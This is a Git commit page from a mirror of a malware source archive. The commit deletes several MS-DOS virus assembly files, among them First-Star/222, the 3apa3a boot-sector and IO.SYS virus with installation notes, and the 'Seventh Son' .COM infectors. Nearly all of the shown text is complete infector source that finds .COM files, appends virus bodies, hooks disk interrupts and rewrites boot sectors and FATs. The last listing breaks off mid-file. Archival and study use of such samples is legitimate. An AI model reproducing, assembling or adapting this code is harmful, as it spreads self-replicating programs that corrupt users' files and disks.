daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 07:49:24 +00:00
Code Issues Projects Releases Wiki Activity

fix/re-organize

Browse Source
This commit is contained in:
vxunderground
2022-08-21 04:12:28 -05:00
parent 4b9382ddbc
commit 62ca392943
8 changed files with 0 additions and 701 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.1st_star.asm
-161
View File
@@ -1,161 +0,0 @@
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;
; First-Star / 222 Virus
;
; (C) by Glenn Benton in 1992
; This is a non-resident direct action .COM infector in current dirs.
;
;
;
Org 0h
Start: Jmp MainVir
Db '*'
MainVir: Call On1
On1: Pop BP
Sub BP,Offset MainVir+3
Push Ax
Mov Ax,Cs:OrgPrg[BP]
Mov Bx,Cs:OrgPrg[BP]+2
Mov Cs:Start+100h,Ax
Mov Cs:Start[2]+100h,Bx
Mov Ah,1ah
Mov Dx,0fd00h
Int 21h
Mov Ah,4eh
Search: Lea Dx,FileSpec[BP]
Xor Cx,Cx
Int 21h
Jnc Found
Jmp Ready
Found: Mov Ax,4300h
Mov Dx,0fd1eh
Int 21h
Push Cx
Mov Ax,4301h
Xor Cx,Cx
Int 21h
Mov Ax,3d02h
Int 21h
Mov Bx,5700h
Xchg Ax,Bx
Int 21h
Push Cx
Push Dx
Mov Ah,3fh
Lea Dx,OrgPrg[BP]
Mov Cx,4
Int 21h
Mov Ax,Cs:[OrgPrg][BP]
Cmp Ax,'MZ'
Je ExeFile
Cmp Ax,'ZM'
Je ExeFile
Mov Ah,Cs:[OrgPrg+3][BP]
Cmp Ah,'*'
Jne Infect
ExeFile: Call Close
Mov Ah,4fh
Jmp Search
FSeek: Xor Cx,Cx
Xor Dx,Dx
Int 21h
Ret
Infect: Mov Ax,4202h
Call FSeek
Sub Ax,3
Mov Cs:CallPtr[BP]+1,Ax
Mov Ah,40h
Lea Dx,MainVir[BP]
Mov Cx,VirLen
Int 21h
Mov Ax,4200h
Call FSeek
Mov Ah,40h
Lea Dx,CallPtr[BP]
Mov Cx,4
Int 21h
Call Close
Ready: Mov Ah,1ah
Mov Dx,80h
Int 21h
Pop Ax
Mov Bx,100h
Push Cs
Push Bx
Retf
Close: Pop Si
Pop Dx
Pop Cx
Mov Ax,5701h
Int 21h
Mov Ah,3eh
Int 21h
Mov Ax,4301h
Pop Cx
Mov Dx,0fd1eh
Int 21h
Push Si
Ret
CallPtr Db 0e9h,0,0
FileSpec Db '*.COM',0
OrgPrg: Int 20h
Nop
Nop
VirLen Equ $-MainVir
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.1stvirus.asm
-165
View File
@@ -1,165 +0,0 @@
; Œ «¥­ìª¨© (¨«¨ ¡®«ì让) ¢¨àãá, § à ¦ î騩 .COM-¯à®£à ¬¬ë
; ¯à¨ § ¯ã᪥, ¥á«¨ ã ­¨å ­¥âã ¢­ ç «¥ JMP.
; ஢¥àª¨ ­  ¢á直¥ ¢áïç­®á⨠­¥ ¯à¨áãâáâ¢ãîâ.
;
; Copyright (c) 1992, Gogi&Givi International.
;
.model tiny
.code
org 0100h
start:
jmp virusstart ; ¥à¥å®¤ ­  ¢¨àãá:
mov ah,09h ; â ª¦¥, ª ª ¡ã¤¥â
int 21h ; á ¦¥à⢮© ¯à¨
mov ax,4C00h ; § à ¦¥­¨¨
int 21h
Message db 'This is little infection... He-he...',13,10,'$'
; „® á¨å ¯®à ­®à¬ «ì­ë©
; ª®¤ ¦¥àâ¢ë
virusstart: ; € íâ® ¢¨àãá
pushf
push ax ; ‘®å࠭塞 ¢á¥, çâ®
push bx ; ⮫쪮 ¬®¦­®...
push cx
push dx
push ds ; ¥ §­ î, ­ áª®«ìª®
push es ; íâ® ¯à ¢¨«ì­®...
push si
call SelfPoint
SelfPoint: ; Ž¯à¥¤¥«ï¥¬ â®çªã
pop si ; ¢å®¤ 
cld ; „¢¨¦¥¬áï ¢¯à ¢®
push cs ; ®áâ ¢¨¬ ᥣ¬¥­â­ë¥
pop ds ; ॣ¨áâàë ­ §­ ç¥­¨ï
push cs ; ¨ ®â¯à ¢«¥­¨ï
pop es
mov di,0100h ; ‚ ¯à¨¥¬­¨ª¥ - 0100h,
push si ; ­ ç «® ¯à®£à ¬¬ë
add si,original-SelfPoint ; ‘¥©ç á SI 㪠§ë¢ ¥â ­ 
mov cx,3 ; ®à¨£¨­ «ì­ë¥ ¡ ©âë
rep movsb ; ‘ª®¯¨à㥬 ¨å ¢ ­ ç «®
pop si ; § à ¦¥­­®© ¯à®£à ¬¬ë
mov ah,1Ah ; ®áâ ¢¨¬ ᮡá⢥­­ãî
mov dx,si ; DTA ¨§ ª®­æ  ¢¨àãá 
add dx,VirusDTA-SelfPoint ; 21h ¯à¥à뢠­¨¥¬
int 21h
mov ah,4Eh ; „¥« ¥¬ FindFirst
mov dx,si ; á ᮮ⢥âáâ¢ãî饩
add dx,FileMask-SelfPoint ; ¬ áª®©
mov cx,32 ; ¨  âਡã⮬ ç⥭¨¥/
int 21h ; § ¯¨áì, çâ®¡ë ­¥
; ¬ã¤à¨âì
jnc RepeatOpen ; Žè¨¡®ª ­¥â - ®âªà뢠¥¬
jmp OutVirus ; ¨§ª® ¯®è¥«...
RepeatOpen:
mov ax,3D02h ; Žâªà®¥¬ ä ©«
mov dx,si ; ¯à¨ ¯®¬®é¨ à áè¨à¥­­®£®
add dx,NameF-SelfPoint ; ã¯à ¢«¥­¨ï ®­ë¬
int 21h
jc OutVirus ; ਠ¢á¥å ®è¨¡ª å ¢ë室¨¬
mov bx,ax ; ‚®§ì¬¥¬ ­®¬¥à ä ©« ,
; ¨ ¡ã¤¥¬ ¤¥à¦ âìáï §  BX
mov ah,3Fh ; ‘ç¨â뢠¥¬ ­ áâ®ï騥
mov dx,si ; ª®¬ ­¤ë ¤«ï
add dx,Original-SelfPoint ; ¨á¯®«­¥­¨ï
mov cx,3 ; ãáâì ¡ã¤¥â âਠ¡ ©â 
int 21h
jc OutVirus ; Ž¯ïâì ¯à®¢¥à¨¬ ­  ®è¨¡ªã...
push bx
mov bx,dx
cmp byte ptr [bx],'é' ; ‚¤à㣠¢ í⮬ ä ©«¥
pop bx ; ⮦¥ á­ ç «  ¯¥à¥å®¤?
;
je CloseNotInfect ; ’®£¤  ­¥ § à ¦ âì!
; Žå, «¥­ì ¬­¥ ¯®â®ç­¥¥
; ¯à®¢¥àïâì...
mov ax,4202h ; à룠¥¬ ¢ ª®­¥æ
xor cx,cx ; ¦¥àâ¢ë (¨§­ á¨«®¢ ­¨ï)
xor dx,dx
int 21h ; ’¥¯¥àì ¢ AX «¥¦¨â
jc OutVirus ;  ¤à¥á ­ ç « 
; ¢¨àãá , ¥á«¨ ­¥â,
; ª®­¥ç­®, ®è¨¡ª¨
push ax
mov ah,40h ; ‡ ¯¨è¥¬
mov dx,si ; ⥫® ¢¨àãá 
sub dx,SelfPoint-VirusStart ; ¢ ä ©«-¦¥àâ¢ã
mov cx,VirusEnd-VirusStart ; Š®«¨ç¥á⢮ ¡ ©â
int 21h
pop ax
jc OutVirus ; Œ®¦¥â á«ãç¨âìáï ®è¨¡ª  -
; ¤¨áª, â ¬, ¯¥à¥¯®«­¥­...
sub ax,3 ; ‚ëç¨â ¥¬ 3 - ç⮡ë
push bx ; ¯®¯ áâì Šã¤   ¤®
mov bx,si
sub bx,SelfPoint-VirusStart
mov word ptr cs:[bx+1],ax ; Š« ¤¥¬  ¤à¥á
mov byte ptr [bx],'é' ; Š®¬ ­¤  ¯¥à¥å®¤  (¢
; ¯à¥¤¥« å ᥣ¬¥­â )
pop bx
mov ax,4200h ; € ⥯¥àì ¢ ­ ç «®
xor cx,cx ; ¦¥àâ¢ë
xor dx,dx
int 21h
jc OutVirus ; ஢¥àª  ­  ®è¨¡ªã
mov ah,40h ; ˆ § ¯¨è¥¬ â㤠
mov dx,si ; ª®¬ ­¤ã ¯¥à¥å®¤ 
sub dx,SelfPoint-VirusStart ; ­  ­ è¥ £­ãá­®¥
mov cx,3 ; ⥫®
int 21h
jc OutVirus ; Ž¯ïâì ¯à®¢¥à¨¬ ®è¨¡ª¨
mov ah,3Eh ; ” ©« ­ ¤® § ªàëâì
int 21h ; (Ž­ 㦥 § à ¦¥­ -
jmp OutVirus ; ¡®«ìè¥ ­¥ à ¡®â ¥¬)
CloseNotInfect:
mov ah,3Eh ; ‡ ªà뢠¥¬ ­¥¯®¤å®¤ï騩
int 21h ; ä ©«
mov dx,si
add dx,FileMask-SelfPoint ; ˆ ¤¥« ¥¬ FindNext
mov ah,4Fh
int 21h
jc OutVirus ; Žè¨¡ª  - §­ ç¨â, ­¥ áã¤ì¡ 
jmp RepeatOpen ; ˆ«¨ ¯¥à¥å®¤ ­  ®âªàë⨥
OutVirus:
pop si ; ˆ, ª®­¥ç­® ¦¥,
pop es ; ¢á¥ ­  ᢥâ¥
pop ds ; ¢®ááâ ­®¢¨âì
pop dx
pop cx
pop bx
pop ax
popf
mov si,0100h ; ‡ ­®á¨¬ ¢ á⥪  ¤à¥á
push si ; ­ ç «  ¯à®£à ¬¬ë
ret ; ¨ ¤¥« ¥¬ RET
;  è¨ ¤ ­­ë¥:
VirusDTA db 30 dup (0) ; â® DTA
NameF db 13 dup (0) ; ’ã⠡㤥⠨¬ï ä ©« 
FileMask db '*.cOm',(0) ; ‚®â â ª ï ªà á¨¢ ï
; ¬ áª 
original:
mov dx,offset Message ; € íâ® ®à¨£¨­ «ì­ë¥ ¡ ©âë
VirusEnd: ; ¨§ ¦¥àâ¢ë (‹®§¨­áª¨©,
; ­¥ §¥¢ ©!)
end start
MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.3apa3a.asm
-520
View File
@@ -1,520 +0,0 @@
; To assemble, simple run TASM and TLINK on this file and generate a binary.
; The first 512d bytes of the binary will contain the portion of the virus
; which resides in IO.SYS. The second 512d bytes will contain the boot
; section portion of the virus.
; Installation is slightly more difficult. It requires you to simulate
; an infection with 3apa3a. Read the text above for information. Basically,
; you have to fill in the BPB in the boot sector, fill in the patch values,
; and then move the pieces onto the disk properly.
.model tiny
.code
.radix 16
org 0
; 3apa3a virus
; Disassembly by Dark Angel of Phalcon/Skism for 40Hex Issue 14
zero:
_3apa3a: push cs
call doffset
doffset: pop si
db 83,0EE,4 ; sub si,4
push si ax bx cx dx ds es
mov ah,4 ; get date
int 1Ah
cmp dh,8 ; september?
jne no_activate
lea bx,cs:[si+message-_3apa3a]
mov ax,0E42 ; begin with B
mov cx,endmessage - message
display_loop: int 10 ; print character
add al,cs:[bx] ; calculate next character
inc bx
loop display_loop
no_activate: cld
xor ax,ax ; ds = 0
mov ds,ax
push cs ; es = cs
pop es
lea di,[si+offset old_i13]
push si
mov si,13*4 ; grab old int 13 handler
movsw
movsw
mov ax,ds:413 ; get BIOS memory size
dec ax ; decrease by 2K
dec ax
mov ds:413,ax ; replace the value
mov cl,6 ; convert to paragraphs
shl ax,cl
mov [si-2],ax ; replace interrupt handler
mov word ptr [si-4],offset i13
mov es,ax ; move ourselves up
push cs
pop ds si
xor di,di
mov cx,200
push si
rep movsw ; copy now!
inc ch ; cx = 1
sub si,200 ; copy rest
rep movsw
pop si
push cs es
mov ax,offset highentry
push ax
retf
highentry: mov ax,7C0
mov ds,ax
mov word ptr ds:200,201
mov byte ptr ds:202,80
les ax,dword ptr cs:203
mov dx,es
pop es
mov bx,si
mov cx,1
mov word ptr cs:3C2,0FCF0 ; patch work_on_sectors to call
call work_on_sectors ; do_i13
pop es ds dx cx bx ax
retf
message: db ' ' - 'B'
db 'B' - ' '
db 'O' - 'B'
db 'O' - 'O'
db 'T' - 'O'
db ' ' - 'T'
db 'C' - ' '
db 'E' - 'C'
db 'K' - 'E'
db 'T' - 'K'
db 'O' - 'T'
db 'P' - 'O'
db 'E' - 'P'
db ' ' - 'E'
db '-' - ' '
db ' ' - '-'
db '3' - ' '
db 'A' - '3'
db 'P' - 'A'
db 'A' - 'P'
db '3' - 'A'
db 'A' - '3'
db '!' - 'A'
db 7 - '!'
db 0Dh - 7
db 10 - 0Dh
endmessage:
do_i13: mov ax,ds:200
mov dl,ds:202
mov byte ptr cs:patch,0EBh ; jmp absolute
int 13 ; do interrupt
mov byte ptr cs:patch,75 ; jnz
jc retry_error
cld
retn
retry_error: cmp dl,80 ; first hard drive?
je do_i13 ; if so, retry
go_exit_i13: jmp exit_i13 ; otherwise quit
i13: push ax bx cx dx si di ds es bp
mov bp,sp
test dl,80 ; hard drive?
patch: jnz go_exit_i13
add dh,cl ; check if working on
add dh,ch ; boot sector or
cmp dh,1 ; partition table
ja go_exit_i13 ; if not, quit
mov ax,cs ; get our current segment
add ax,20 ; move up 200 bytes
mov ds,ax
mov es,ax
mov word ptr ds:200,201 ; set function to read
mov ds:202,dl ; set drive to hard drive
mov bx,400 ; set buffer
xor dx,dx ; read in the boot sector
push dx
mov cx,1
call do_i13 ; read in boot sector
cmp byte ptr ds:400+21,2E ; check if 3apa3a already there
je go_exit_i13
cmp byte ptr ds:400+18,0
je go_exit_i13
push cs
pop es
mov di,203
mov si,403
mov cx,1Bh ; copy disk tables
cld
rep movsb
sub si,200 ; copy the rest
mov cx,1E2
rep movsb
inc byte ptr ds:201 ; set to write
mov ax,ds:16 ; get sectors per FAT
mul byte ptr ds:10 ; multiply by # FATs
mov bx,ds:11 ; get number of sectors
mov cl,4 ; occupied by the root
shr bx,cl ; directory
db 83,0FBh,5 ; cmp bx,5 ; at least five?
jbe go_exit_i13 ; if not, quit
add ax,bx ;
add ax,ds:0E ; add # reserved sectors
dec ax ; drop two sectors to find
dec ax ; start of last sector
xor dx,dx ; of root directory
push ax dx
call abs_sec_to_BIOS
mov ds:patch1-200,cx ; move original boot
mov ds:patch2-200,dh ; sector to the end of the
xor bx,bx ; root directory
call do_i13
pop dx ax
dec ax
call abs_sec_to_BIOS
mov ds:34,cx ;patch3 ; write io portion to
mov ds:37,dh ;patch4
add bh,6 ; bx = 600
call do_i13
push ds
xor ax,ax
mov ds,ax
mov dx,ds:46C ; get timer ticks
pop ds
mov bl,dl ; eight possible instructions
db 83,0E3,3 ; and bx,3
push bx
shl bx,1 ; convert to word index
mov si,bx
mov cx,es:[bx+encrypt_table]
pop bx
push bx
mov bh,bl
shr bl,1 ; bl decides which ptr to use
lea ax,cs:[bx+2BBE] ; patch pointer
mov ds:[decrypt-bs_3apa3a],ax ; and start location
add ch,bl
mov ds:[encrypt_instr-bs_3apa3a],cx
add ax,0CF40
mov ds:[patch_endptr-bs_3apa3a],ax
pop ax
push ax
mul dh
add al,90 ; encode xchg ax,??
add bl,46 ; encode inc pointer
mov ah,bl
mov ds:[patch_incptr-bs_3apa3a],ax
mov dx,word ptr cs:[si+decrypt_table]
mov word ptr cs:decrypt_instr,dx
pop di
db 83,0C7 ;add di,XX ; start past decryptor
dw bs_3apa3a_decrypt - bs_3apa3a
org $ - 1
mov si,di
push ds
pop es
mov cx,end_crypt - bs_3apa3a_decrypt; bytes to crypt
mov ah,al
encrypt_loop: lodsb
decrypt_instr: add al,ah
stosb
loop encrypt_loop
pop dx
mov cx,1 ; write the replacement
xor bx,bx ; boot sector to the disk
call do_i13
exit_i13: mov sp,bp
pop bp es ds di si dx cx bx ax
db 0EAh
old_i13 dw 0, 0
decrypt_table: not al
sub al,ah
add al,ah
xor al,ah
encrypt_table dw 014F6 ; not
dw 0480 ; add
dw 2C80 ; sub
dw 3480 ; xor
; This marks the end of the IO.SYS only portion of 3apa3a
; The boot sector portion of 3apa3a follows.
adj_ofs = 7C00 + zero - bs_3apa3a
bs_3apa3a: jmp short decrypt
nop
; The following is an invalid boot sector. Replace it with
; yours.
db ' '
db 00, 00, 00, 00, 00, 00
db 00, 00, 00, 00, 00, 00
db 00, 00, 00, 00, 00, 00
db 00
decrypt: db 0BF ; mov di,
dw adj_ofs + bs_3apa3a_decrypt
decrypt_loop: db 2e ; cs:
encrypt_instr label word
db 80,2Dh ; sub byte ptr [di],XX
patch_incptr label word
db 0 ; temporary value for cryptval
inc di
db 81 ; cmp
patch_endptr label word
db 0ff ; pointer
dw adj_ofs + end_crypt
jne decrypt_loop
bs_3apa3a_decrypt = $ - 1
jmp short enter_bs_3apa3a
nop
load_original: xor dx,dx ; set up the read
mov es,dx ; of the original boot sector
db 0B9 ; mov cx, XXXX
patch3 dw 3
db 0B6
patch4 db 1
mov bx,ds ; es:bx = 0:7C00
mov ax,201
db 0ebh ; jump to code in stack
dw bs_3apa3a - 4 - ($ + 1)
org $ - 1
enter_bs_3apa3a:cli
xor ax,ax
mov ss,ax ; set stack to just below us
mov sp,7C00
sti
mov dl,80 ; reset hard drive
int 13
mov ax,2F72 ; encode JNZ load_original at
; 7BFE
mov ds,sp ; set segment registers to
mov es,sp ; 7C00
push ax
mov word ptr ds:200,201 ; do a read
mov ds:202,dl ; from the hard drive
xor bx,bx ; read to 7C00:0
mov dh,1 ; read head 1
mov cx,1 ; read sector 1
; (assumes active boot
; sector is here)
mov ax,13CDh ; encode int 13 at 7BFC
push ax
call exec_int13 ; do the read
mov bx,203
cmp byte ptr [bx-4],0AA ; is it valid bs?
jnz_load_original:
jne load_original ; if not, assume infected and
; transfer control to it
mov ax,ds:13 ; get number of sectors in
dec ax ; image - 1
cmp ax,5103 ; hard drive too small? (5103h
jbe load_original ; sectors ~ 10.6 megs)
mov ax,ds:1C ; get number hidden sectors
add ax,ds:0E ; add number reserved sectors
mov ds:9,ax ; store at location that holds
; the end of OEM signature
add ax,ds:16 ; add sectors per FAT
dec ax ; go down two sectors
dec ax
push ax
xor dx,dx
mov cx,dx
call work_on_sectors ; load end of FAT to 7C00:203
mov ax,ds:16 ; get sectors per FAT
push ax ; save the value
mul byte ptr ds:10 ; multiply by # FATs
add ax,ds:9 ; calculate start of root dir
mov ds:7,ax ; store it in work buffer
mov cl,4
mov si,ds:11 ; get number sectors the
shr si,cl ; root directory takes
add si,ax ; and calculate start of data
mov ds:5,si ; area and store it in buffer
call work_on_sectors ; get first 5 sectors of the
; root directory
test byte ptr ds:403+0Bh,8 ; volume label bit set on first
; entry? (infection marker)
jne_load_original: ; if so, already infected, so
jnz jnz_load_original ; quit
xor si,si
mov bx,1003
mov ax,ds:403+1A ; get starting cluster number
; of IO.SYS
read_IO_SYS: push ax ; convert cluster to absolute
call clus_to_abs_sec ; sector number
call work_on_sector ; read in one cluster of IO.SYS
inc si
pop ax
push bx ax
mov bx,403+0A00 ; read into this buffer
push bx
mov al,ah ; find the sector with the FAT
xor dx,dx ; entry corresponding to this
mov ah,dl ; cluster
add ax,ds:9
call work_on_sectors ; read in the FAT
pop bx ax
mov ah,dl
shl ax,1
mov di,ax
mov ax,[bx+di] ; grab the FAT entry (either EOF
; or next cluster number)
pop bx ; corresponding to this cluster
cmp ax,0FFF0 ; is there any more to read?
jb read_IO_SYS ; if so, keep going
inc byte ptr ds:201 ; change function to a write
pop cx
dec cx
dec cx
mov ds:4,cl
mov di,401 ; scan the end of the FAT
mov cx,100
mov bp,-1
copy_IO_SYS: xor ax,ax ; look for unused clusters
repne scasw
jnz jne_load_original
mov [di+2],bp
mov bx,cx
mov bh,ds:4
mov bp,bx ; save starting cluster of
push bp cx ; where IO.SYS will be moved
mov ah,ds:0Dh
shl ax,1
dec si
mul si
mov bx,ax
add bx,1003
mov ax,bp
call clus_to_abs_sec
call work_on_sector ; move IO.SYS to end of HD
pop cx bp
or si,si
jnz copy_IO_SYS
mov si,0DE1 ; move all but the first two
mov di,0E01 ; directory entries down one
mov cx,4D0 ; (10 dir entries / sector,
rep movsw ; 5 sectors)
; DF set by exec_int13
mov si,421 ; move IO.SYS entry down two
mov cx,10 ; entries
rep movsw
mov ds:400+2*20+1Dh,bp ; set starting cluster of the
; moved original IO.SYS
or byte ptr ds:40E,8 ; set volume label bit on first
; IO.SYS entry
mov bx,403 ; point to root directory
mov ax,ds:7 ; get starting cluster of
xor dx,dx ; root dir
mov cl,4
call work_on_sectors ; write updated root directory
pop ax ; to the disk
write_FATs: mov bx,203 ; point to the updated FAT
call work_on_sectors ; write changed end of FAT
dec ax
add ax,ds:16 ; add sectors per FAT
dec byte ptr ds:10 ; processed all the FATs?
jnz write_FATs
mov ax,bp
call clus_to_abs_sec
mov cs:7C03,ax ; store the values
mov cs:7C05,dx
mov byte ptr cs:7C01,1Ch
xor ax,ax ; reset default drive
mov dx,ax
int 13
mov ax,201 ; read in original boot sector
; You must patch the following values if you are installing 3apa3a on a disk
db 0b9 ; mov cx, XXXX
patch1 dw 0
db 0b6 ; mov dh, XX
patch2 db 0
mov bx,0E03
call perform_int13
mov ax,ds:403+1A ; get starting cluster number
call clus_to_abs_sec ; of IO.SYS
xor cx,cx
call work_on_sectors
mov bx,ds
mov es,cx
call work_on_sectors
go_load_original:
jmp load_original
exec_int13: mov ax,ds:200 ; get function from memory
mov dl,ds:202 ; get drive from memory
perform_int13: int 13
jc go_load_original
std
retn
work_on_sectors:inc cx
work_on_sector: push cx dx ax
call abs_sec_to_BIOS
call exec_int13
pop ax dx cx
add ax,1 ; calculate next sector
db 83,0D2,0 ; adc dx,0 ; (don't use INC because
add bh,2 ; INC doesn't set carry)
loop work_on_sector ; do it for the next sector
retn
abs_sec_to_BIOS:div word ptr ds:18 ; divide by sectors per track
mov cx,dx
inc cl
xor dx,dx
div word ptr ds:1A ; divide by number of heads
ror ah,1
ror ah,1
xchg ah,al
add cx,ax
mov dh,dl
retn
clus_to_abs_sec:mov cl,ds:0Dh ; get sectors per cluster
xor ch,ch ; (convert to word)
dec ax
dec ax
mul cx ; convert cluster number to
add ax,ds:5 ; absolute sector number
end_crypt: db 83,0D2,0 ; adc dx,0
retn
dw 0AA55 ; boot signature
end _3apa3a
MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son.asm
-251
View File
@@ -1,251 +0,0 @@
From netcom.com!ix.netcom.com!netnews Tue Nov 29 09:42:48 1994
Xref: netcom.com alt.comp.virus:506
Path: netcom.com!ix.netcom.com!netnews
From: Zeppelin@ix.netcom.com (Mr. G)
Newsgroups: alt.comp.virus
Subject: 7th Son Virus
Date: 29 Nov 1994 13:02:59 GMT
Organization: Netcom
Lines: 236
Distribution: world
Message-ID: <3bf8q3$iaj@ixnews1.ix.netcom.com>
References: <sbringerD00yHv.Hs3@netcom.com> <bradleymD011vJ.Lp8@netcom.com>
NNTP-Posting-Host: ix-pas2-10.ix.netcom.com
;***********************************************************************
*****
;* Seventh son of a seventh son version 4
;*
;* Compile with MASM 4.0
;* (other assemblers will probably not produce the same result)
;*
;* Disclaimer:
;* This file is only for educational purposes. The author takes no
;* responsibility for anything anyone does with this file. Do not
;* modify this file!
;***********************************************************************
*****
cseg segment
assume cs:cseg,ds:cseg,es:cseg,ss:cseg
.RADIX 16
FILELEN equ end - start
MINTARGET equ 1000d
MAXTARGET equ -(FILELEN+40)
;***********************************************************************
*****
;* Dummy program (infected)
;***********************************************************************
*****
org 100
begin: db 4Dh ;virus mark
db 0E9h, 4, 0 ;jump to virus entry
;***********************************************************************
*****
;* Begin of the virus
;***********************************************************************
*****
start: db 0CDh, 20h, 0, 0
cld
mov si,0100h
push si ;push new IP on stack
mov di,si
add si,[si+2] ;si -> start
push si ;restore original begin
movsw
movsw
pop si
mov ax,3300h ;get ctrl-break flag
int 21
push dx
cwd ;clear the flag
inc ax
push ax
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
lea dx,[si+(offset ni24 - 0104)] ;set new int24
vector
mov ah,25h
push ax
int 21
mov ah,2Fh ;get DTA adres
int 21
push es
push bx
add dx,070h ;set new DTA adres
mov ah,1Ah
int 21
add dx,1Eh
push dx
lea di,[si+(offset generation-0104)] ;check
generation
cmp [di],0707h
jne verder
lea dx,[di+2] ;7th son of a 7th son!
mov ah,09h
int 21
verder: mov ax,[di] ;update generations
xchg ah,al
mov al,1
mov [di],ax
lea dx,[di+33d] ;find first COM-file
xor cx,cx
mov ah,4Eh
infloop: int 21
pop dx
jc stop
push dx
xor cx,cx ;clear
read-only-arttribute
mov ax,4301
int 21
jc return1
mov ax,3D02h ;open the file
int 21
jc return1
xchg bx,ax
mov ax,5700h ;get file date & time
int 21
push cx
push dx
mov cx,4 ;read begin of file
mov dx,si
mov ah,3fh
int 21
cmp byte ptr [si],4Dh ;already infected or an
EXE?
je return2
cmp byte ptr [si],5Ah ;or a weird EXE?
je return2
mov al,2 ;go to end of file
call seek
cmp ax,MAXTARGET ;check length of file
jnb return2
cmp ax,MINTARGET
jbe return2
push ax
mov cx,FILELEN ;write program to end of
file
mov ah,40h
int 21
cmp ax,cx ;are all bytes written?
pop ax
jnz return2
xchg ax,bp
mov al,0 ;go to begin of file
call seek
mov word ptr [si],0E94Dh ;write mark and
jump-command
mov word ptr [si+2],bp
mov ah,40h
int 21
inc byte ptr [di] ;number of next son
return2: pop dx ;restore file date &
time
pop cx
mov ax,5701h
int 21
mov ah,3Eh ;close the file
int 21
return1: mov ah,4Fh ;find next file
jmp short infloop
stop: pop dx ;restore DTA adres
pop ds
mov ah,1Ah
int 21
pop ax ;restore int24 vector
pop ds
pop dx
int 21
pop ax ;restore ctrl-break flag
pop dx
int 21
push cs
push cs
pop ds
pop es
ret
seek: mov ah,42
cwd
int21: xor cx,cx
int 21
mov cl,4
mov dx,si
ret
;***********************************************************************
*****
;* Interupt handler 24
;***********************************************************************
*****
ni24: mov al,03
iret
;***********************************************************************
*****
;* Data
;***********************************************************************
*****
generation db 1,1
sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$'
filename db '*.COM',0
db '‚¨°³±'
end:
cseg ends
end begin
MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son2.asm
-232
View File
@@ -1,232 +0,0 @@
;****************************************************************************
;* Seventh son of a seventh son version 2
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:cseg,ss:cseg
FILELEN equ end - start
MINTARGET equ 1000
MAXTARGET equ -(FILELEN+40h)
org 100h
.RADIX 16
;****************************************************************************
;* Dummy program (infected)
;****************************************************************************
begin: db 4Dh
jmp start
;****************************************************************************
;* Begin of the virus
;****************************************************************************
start: call start2
start2: pop bp
sub bp,0103h
lea si,[bp+offset begbuf-4] ;restore begin of file
mov di,0100h
movsw
movsw
mov ax,3300h ;get ctrl-break flag
int 21
push dx
xor dl,dl ;clear the flag
mov ax,3301h
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
mov dx,offset ni24 - 4 ;set new int24 vector
add dx,bp
mov ax,2524h
int 21
lea dx,[bp+offset end] ;set new DTA adres
mov ah,1Ah
int 21
add dx,1Eh
mov word ptr [bp+offset nameptr-4],dx
lea si,[bp+offset grandfather-4] ;check generation
cmp [si],0606h
jne verder
lea dx,[bp+offset sontxt-4] ;7th son of a 7th son!
mov ah,09h
int 21
verder: mov ax,[si] ;update generations
xchg ah,al
xor al,al
mov [si],ax
lea dx,[bp+offset filename-4] ;find first COM-file
xor cx,cx
mov ah,4Eh
int 21
infloop: mov dx,word ptr [bp+offset nameptr-4]
call infect
